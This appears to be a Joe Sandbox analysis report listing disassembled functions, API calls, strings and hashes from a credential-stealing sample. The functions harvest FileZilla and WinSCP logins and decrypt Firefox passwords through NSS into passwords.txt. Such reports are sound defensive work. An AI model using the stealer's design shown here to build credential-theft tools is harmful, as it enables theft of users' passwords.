                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CAD5
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D38), ref: 0040CAE4
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CAF7
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D3C), ref: 0040CB06
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Login: ), ref: 0040CB15
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CB28
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D48), ref: 0040CB37
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Password: ), ref: 0040CB46
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CB59
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D58), ref: 0040CB68
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D5C), ref: 0040CB77
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 0040CBBB
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00417CD9,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBD1
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040CC22
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrlen$lstrcpy$mallocmemsetstrncpystrtok_s
                                                                                                                                                                                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$niBkiBjiB$passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 368316605-791898180
                                                                                                                                                                                                                                                    • Opcode ID: ce9cf5654bdfcda3da3b98d6d7313953ceb3fa3095390a9a2a39e93665ad34df
                                                                                                                                                                                                                                                    • Instruction ID: 201bcc1a07b8ed4ab31451ab60476e64b5eaca1d35b73e74bf71d04f9c26d2ba
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce9cf5654bdfcda3da3b98d6d7313953ceb3fa3095390a9a2a39e93665ad34df
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1B17075900219AACB14EBE5DC5AEEEBB38AF15704F50047EF50273192DF786A08CB68
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00409240 Relevance: 61.5, APIs: 34, Strings: 1, Instructions: 295stringmemoryfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • NSS_Init.NSS3(00000000,00000000,00000000,00000009,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 0040926E
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 00409353
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 0040935C
                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 0040936B
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00409375
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00420448,00000000,?,?,?,?,?,?,?,00000000,00420448,000000FF), ref: 00409388
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 00409395
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 0040939C
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,015D1EC8,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 004093AD
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(-00000010,015D1EE0,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 004093CB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015CF8A0), ref: 004093E1
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 004093F4
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426A70), ref: 00409403
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00409416
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426A74), ref: 00409425
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015CF8C0), ref: 00409435
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,-00000010), ref: 00409440
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426A78), ref: 0040944F
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(-000000FE,015D1968,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 00409460
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000014,015D1648,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 00409471
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015CF7A0), ref: 00409487
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: memset.MSVCRT ref: 00409139
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: lstrlenA.KERNEL32(00409493,00000001,?,00001FA0,00000000,00000000,?,00409493), ref: 00409156
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: CryptStringToBinaryA.CRYPT32(00409493,00000000,?,00409493), ref: 0040915E
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: PK11_GetInternalKeySlot.NSS3(?,00409493), ref: 0040916C
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00409493), ref: 00409181
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: PK11SDR_Decrypt.NSS3(00000000,?,00000000), ref: 004091B5
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: memcpy.MSVCRT ref: 004091D1
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: PK11_FreeSlot.NSS3 ref: 004091EB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040949B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426A7C), ref: 004094AA
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(-000000FE,015D1648,?,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 004094BB
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000014,015CF7F0,?,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 004094CC
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015D1E38), ref: 004094E2
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: lstrcat.KERNEL32(004268C6,004268CA), ref: 0040920D
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00420448), ref: 00409214
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 004094F6
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426A80), ref: 00409505
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426A84), ref: 00409514
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(-00000002,015D1EC8,?,?,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 00409525
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 00409539
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040958B
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00409594
                                                                                                                                                                                                                                                    • NSS_Shutdown.NSS3(?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 0040959A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$FileK11_lstrcpy$Slotlstrlen$FreeHeapPointermemset$AllocAuthenticateBinaryCloseCryptDecryptHandleInitInternalProcessReadShutdownSizeStringmemcpy
                                                                                                                                                                                                                                                    • String ID: passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 888326940-347816968
                                                                                                                                                                                                                                                    • Opcode ID: c46e45234dfa5e111babf87955bc521f9e39e8e30282efd66edc5953ebf13779
                                                                                                                                                                                                                                                    • Instruction ID: ca2ad9bb6b80040cc805ae6bc8cbf22e6a20f3758a562a1b8aced67113837563
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c46e45234dfa5e111babf87955bc521f9e39e8e30282efd66edc5953ebf13779
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEB1C175900219EBDB14EBA0DC4AFEE7B79AF19704F10053DFA02B3291CB786A04CB65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040C4A8 Relevance: 54.5, APIs: 22, Strings: 9, Instructions: 221stringregistryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,Soft: WinSCP), ref: 0040C4BC
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,Host: ), ref: 0040C4CB
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(0040EAF6,?,HostName,00000002,00000000,00000000,?), ref: 0040C4EF
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 0040C4FC
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(0040EAF6,?,PortNumber,0000FFFF,00000000,00420D80,?), ref: 0040C527
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 0040C54D
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,:22), ref: 0040C569
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00426C68), ref: 0040C578
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,Login: ), ref: 0040C587
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(0040EAF6,?,UserName,00000002,00000000,?,?), ref: 0040C5AB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 0040C5B8
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00426C80), ref: 0040C5C7
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(0040EAF6,?,Password,00000002,00000000,?,?), ref: 0040C5EB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,Password: ), ref: 0040C5F6
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0042695B), ref: 0040C608
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 0040C643
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00426C9C), ref: 0040C65D
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00426CA0), ref: 0040C66C
                                                                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(0040EAF6,00000001,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C691
                                                                                                                                                                                                                                                      • Part of subcall function 00411A50: wsprintfA.USER32 ref: 00411A6B
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C6A2
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C6B0
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040C6C8
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C718
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Value$memset$Enumlstrlenwsprintf
                                                                                                                                                                                                                                                    • String ID: Host: $HostName$Login: $Password$Password: $PortNumber$Soft: WinSCP$UserName$passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 2902345061-4040920679
                                                                                                                                                                                                                                                    • Opcode ID: e139fa6c5b6744e1113b7c42ec81520831a72db253033456269ab67ae5190ab9
                                                                                                                                                                                                                                                    • Instruction ID: 54c9f3f9f88f1a5b2f2c5dba5bbb759f0d4fd80bf01840b284e73203c45026b4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e139fa6c5b6744e1113b7c42ec81520831a72db253033456269ab67ae5190ab9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4817FB1A0022EABDB14EBE4CD85EFF7779EF48704F10455AF105B3180DA786A488B65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E47E6 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 220threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C6E4801
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6E4817
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6E482D
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E484A
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB3F: EnterCriticalSection.KERNEL32(6C75E370,?,?,6C6D3527,6C75F6CC,?,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB49
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB3F: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D3527,6C75F6CC,?,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70AB7C
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6E485F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6E487E
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C6E488B
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C6E493A
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6E4956
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C6E4960
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C6E499A
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C6E49C6
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6F5EDB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: memset.VCRUNTIME140(ewsl,000000E5,?), ref: 6C6F5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6F5FB2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C6E47FC
                                                                                                                                                                                                                                                    • MOZ_PROFILER_SHUTDOWN, xrefs: 6C6E4A42
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_shutdown, xrefs: 6C6E4A06
                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6E4812
                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6E4828
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                                                                                                                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                                                                                                                                                                                    • API String ID: 1340022502-4194431170
                                                                                                                                                                                                                                                    • Opcode ID: 3c9417af23fbec348dda23111d29f56c74674ed395e7ec0df7df8b9c944d078a
                                                                                                                                                                                                                                                    • Instruction ID: 9db6dd8205cf7bd39cde8ddb493e7eade9204d94e7a8d97278972027921f1b19
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c9417af23fbec348dda23111d29f56c74674ed395e7ec0df7df8b9c944d078a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4814870A0A1108BDB009FBCC84877A3775AF4A32CF940636D826A7B45DB71E955CB9E
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E4470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6E44B2,6C75E21C,6C75F7F8), ref: 6C6E473E
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C6E474A
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6E44BA
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6E44D2
                                                                                                                                                                                                                                                    • InitOnceExecuteOnce.KERNEL32(6C75F80C,6C6DF240,?,?), ref: 6C6E451A
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C6E455C
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 6C6E4592
                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(6C75F770), ref: 6C6E45A2
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000008), ref: 6C6E45AA
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000018), ref: 6C6E45BB
                                                                                                                                                                                                                                                    • InitOnceExecuteOnce.KERNEL32(6C75F818,6C6DF240,?,?), ref: 6C6E4612
                                                                                                                                                                                                                                                    • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C6E4636
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(user32.dll), ref: 6C6E4644
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C6E466D
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E469F
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E46AB
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E46B2
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E46B9
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E46C0
                                                                                                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6E46CD
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C6E46F1
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6E46FD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                                                                                    • String ID: Gul$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                                                                                    • API String ID: 1702738223-3710063018
                                                                                                                                                                                                                                                    • Opcode ID: 94c959ddb160ab38cc061d62032ead993cd8066b9edc0c6462f08989882cb0e6
                                                                                                                                                                                                                                                    • Instruction ID: 758fe7e3f096bfa5386ec5c0ee655920cd8f5f2e267fd8d3a2ce02af1a3e8871
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94c959ddb160ab38cc061d62032ead993cd8066b9edc0c6462f08989882cb0e6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 986108B06093449FEB009FB1CC09BB57BB8EB4A308F84C56AE5049B641DFB1AA55CF95
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
